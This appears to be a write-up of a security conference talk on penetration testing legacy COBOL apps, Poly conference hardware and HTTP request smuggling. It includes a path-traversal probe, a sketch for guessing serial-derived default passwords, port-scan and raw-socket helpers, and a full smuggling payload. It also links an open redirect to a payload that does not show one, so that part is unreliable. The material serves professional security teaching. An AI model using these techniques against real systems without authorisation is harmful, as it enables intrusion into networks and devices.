
Does The Fog Ever Stop? Testing Without All The Answers

Security BSides London · 15:17 · 2025

This talk explores the methodology of conducting penetration tests on unfamiliar technologies, specifically legacy COBOL applications and specialized conference room hardware. The speaker demonstrates how to identify and exploit local file inclusion (LFI) in a legacy system and how to perform network reconnaissance and default credential exploitation on Poly conference equipment. The presentation emphasizes the importance of fundamental security knowledge, thorough documentation, and adaptability when facing unknown environments.

Beyond the Checklist: Exploiting Legacy COBOL and Poly Conference Hardware

TL;DR: This post breaks down how to approach unfamiliar targets like legacy COBOL applications and specialized conference room hardware by focusing on fundamental protocol behavior rather than automated scanning. By identifying local file inclusion in a legacy system and exploiting default credentials on Poly conference devices, we demonstrate that manual testing often uncovers what automated tools miss. Pentesters should prioritize understanding how requests are processed across different layers of the stack to identify vulnerabilities like HTTP request smuggling and insecure redirects.

Testing against legacy systems often feels like walking into a room where the lights have been off for decades. Most modern scanners will choke on COBOL-based backends or specialized hardware interfaces, leaving you with a false sense of security or, worse, an empty report. The reality is that these systems are often the most fragile parts of an enterprise network. When you encounter a target that doesn't fit the standard web application profile, stop relying on your automated toolchain and start looking at how the application handles the fundamental building blocks of network communication.

Breaking Legacy COBOL Applications

Legacy applications, particularly those written in COBOL, are still surprisingly common in banking and insurance sectors. These systems often act as the core processing engine, hidden behind a modern web-based front end. During a recent engagement, I encountered a system that allowed users to select a CSV file for processing. The interface was minimal, and the backend was a black box.

Instead of throwing a massive wordlist at the input field, I looked at the error messages. When I supplied an arbitrary filename, the application returned the full path it was attempting to access. This is a classic indicator of Local File Inclusion (LFI), but in a legacy context, it often points to a lack of input sanitization in the underlying file handling routines.

By testing with simple path traversal sequences, I confirmed the vulnerability.

# Testing for LFI on the legacy endpoint: the error message
# echoes back the full path the backend attempts to open
../test

The application failed to properly validate the input, allowing me to traverse the directory structure. Although the file-extension constraints couldn't be bypassed in this case, the ability to read arbitrary files from the server is still a significant finding. In a real-world engagement, this is the kind of bug that leads to credential harvesting or the exposure of sensitive configuration files, which older systems often store in plain text.
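The detection step above can be sketched as a small helper. The endpoint details aren't public, so this only shows the reusable part: a heuristic that flags responses where the backend echoes the path it tried to open.

```python
import re

# Traversal payloads to try against the file-selection parameter.
# "../test" mirrors the probe used in the engagement; the deeper
# variants are standard follow-ups.
PAYLOADS = ["../test", "../../test", "../../../test"]

def leaks_path(body: str, payload: str) -> bool:
    """Heuristic check: the error message discloses a filesystem path
    if it echoes the payload as part of an absolute path, e.g.
    "cannot open /opt/app/data/../test"."""
    return re.search(r"/[\w./-]*" + re.escape(payload), body) is not None
```

In practice you would feed each payload to the endpoint and run the response body through leaks_path; any hit means the backend is disclosing the paths it attempts to open, which is the tell that led to the LFI here.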

Hardware Reconnaissance and Default Credentials

Conference room hardware, such as the Poly TC10 and Studio G9, presents a different set of challenges. These devices are essentially mini-computers designed to join meetings, but they are often deployed with minimal hardening. During a recent test, I found that these devices were configured with default credentials that were derived from the device's serial number.
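The exact serial-to-password mapping is not disclosed, but the general shape of the attack can be sketched: once the pattern is inferred from a single device, you can derive candidate defaults for every other unit. All of the patterns below are hypothetical illustrations, not Poly's actual scheme.

```python
# Hypothetical serial-derived default passwords. The real derivation
# scheme is not public; these patterns only illustrate the approach.
def candidate_passwords(serial: str) -> list[str]:
    s = serial.strip().upper()
    return [
        s,                  # the serial verbatim
        s[-6:],             # last six characters
        "admin" + s[-4:],   # vendor prefix plus a suffix
    ]
```

Each candidate is then tried against the admin login, keeping an eye on any lockout thresholds the device enforces.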

This is a common Identification and Authentication Failure, and it highlights why hardware testing requires a mix of physical inspection and network analysis. Once I gained access to the admin panel, I was able to inspect the network settings. I discovered that the device was using a manual IP configuration, which allowed me to map the internal network and identify other connected devices.

By manually setting the IP address and scanning the device, I found that port 514, commonly used for syslog, was open. While this wasn't a shell, an exposed logging port, combined with the device's insecure TLS configuration, allowed for further reconnaissance. The key takeaway here is that hardware is just another endpoint: if you can get into the admin panel, you can usually find a way to pivot into the rest of the network.
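A plain TCP connect scan is enough to surface listeners like the one on 514. A minimal sketch in Python (the device IP below is a placeholder, and the service labels are just best guesses for common ports):

```python
import socket

# Ports worth probing on embedded conference hardware; 514 is the
# classic logging (syslog) port that turned up open here.
SERVICE_HINTS = {22: "ssh", 443: "https", 514: "syslog"}

def check_port(host: str, port: int, timeout: float = 1.0) -> bool:
    """TCP connect scan for a single port: True if something accepts."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0

def label(port: int) -> str:
    """Best-guess service name for a discovered port."""
    return SERVICE_HINTS.get(port, "unknown")

# Example sweep (192.0.2.10 is a documentation/placeholder address):
# for p in SERVICE_HINTS:
#     if check_port("192.0.2.10", p):
#         print(p, label(p))
```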

The Risks of HTTP/1.1 Downgrading

One of the most interesting findings from recent research involves the way modern web applications handle HTTP Request Smuggling. Many front-end servers still support HTTP/1.1 for compatibility with legacy components. When a front-end server receives an HTTP/2 request but forwards it to a back-end server as HTTP/1.1, it must reformat the request.

If the front-end and back-end servers disagree on how to define the end of a request, you can smuggle a second request inside the first. This can lead to cache poisoning or the hijacking of other users' requests. During a test, I used this technique to identify an open redirect vulnerability.

POST / HTTP/1.1
Host: example.com
Content-Length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

The vulnerability exists because the application doesn't sanitize user input before the back-end processes it. By injecting a full URL into the scheme header (in an HTTP/2 downgrade, the :scheme pseudo-header value gets copied into the rewritten request), I was able to force an open redirect. While a domain-fronting blocker prevented full exploitation in this specific instance, the risk is clear: on a production application without these protections, this could be used to bypass security controls and redirect users to malicious sites.
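It is worth verifying the arithmetic in payloads like the one above: the chunk-size line ("5c") must equal the byte length of the embedded request, or the back-end will misparse the chunk boundary. A quick check in Python:

```python
# Rebuild the chunked body from the smuggling example and confirm the
# chunk-size line ("5c") matches the embedded request's byte length --
# an off-by-one here makes the back-end misparse the chunk.
smuggled = (
    "GPOST / HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 15\r\n"
    "\r\n"
    "x=1"
)
chunk_size = format(len(smuggled.encode()), "x")
print(chunk_size)  # -> 5c (92 bytes)
```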

Moving Beyond the Toolchain

The most effective way to improve your testing methodology is to document everything. When you encounter a new technology, don't just run a scan and move on. Take the time to understand how the application handles requests and where the boundaries are. This not only helps you find more bugs, but it also builds the consultancy skills you need to explain your findings to clients.

If you find yourself stuck, look at the documentation for the protocols involved. Understanding the RFCs for HTTP/1.1 and HTTP/2 is often more valuable than any automated tool. The next time you are on an engagement, try to spend an hour just mapping the application's behavior without using a scanner. You might be surprised by what you find.
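One concrete way to do that mapping is to skip HTTP libraries entirely and speak to the server over a raw socket, so nothing normalises your requests before they hit the wire. A minimal sketch (the target hostname is a placeholder):

```python
import socket

def raw_request(host: str, port: int, request: bytes,
                timeout: float = 5.0) -> bytes:
    """Send a hand-built HTTP/1.1 request and return the raw response.
    Working at the socket level shows exactly how the server handles
    framing details that high-level clients normalise away."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
        return b"".join(chunks)

# A baseline request to compare the server's behaviour against:
req = (b"GET / HTTP/1.1\r\n"
       b"Host: target.example\r\n"
       b"Connection: close\r\n"
       b"\r\n")
```

From there you can vary one framing detail at a time, such as duplicate headers or conflicting length fields, and diff the responses to map how each layer parses the request.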

Talk Type: talk
Difficulty: intermediate
Category: red team

BSides London 2025 Rookie Track 1
